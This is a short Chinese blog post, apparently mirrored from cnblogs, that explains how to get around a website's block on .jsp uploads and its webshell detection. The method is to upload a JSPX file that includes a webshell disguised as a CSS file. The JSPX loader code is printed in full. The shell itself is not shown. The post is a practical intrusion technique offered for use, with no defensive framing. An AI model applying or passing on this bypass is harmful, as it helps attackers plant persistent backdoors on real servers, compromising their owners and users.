zoukankan      html  css  js  c++  java
  • 记一次对上传对jsp限制的绕过

    当访问网站任何.jsp后缀的文件时都会显示如下图所示或者session timeout等提示,

    并且网站防护会,对上传大马和一句话会被查杀。

    解决方法:

    利用jspx包含,利用jspx包含图片或者css等可以绕过防护,demo_table_util.css是大马文件。

    <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
              xmlns="http://www.w3.org/1999/xhtml"
              xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
        <jsp:directive.page contentType="text/html" pageEncoding="utf-8"/>
        <jsp:directive.page import="java.io.*"/>
        <jsp:directive.page import="java.util.*"/>
        <jsp:directive.page import="javax.servlet.*"/>
        <jsp:directive.page import="javax.servlet.http.*"/>
    
      <jsp:directive.include file="../css/demo_table_util.css" />
    
    
    </jsp:root>
  • 相关阅读:
    12.22冲刺总结
    Android远程服务
    短信电话监听
    Android本地服务
    意图
    多线程下载
    异步HTTP请求
    提交数据到服务器
    通过HTTP访问网络资源
    观察者
  • 原文地址:https://www.cnblogs.com/kankanhua/p/6086998.html
Copyright © 2011-2022 走看看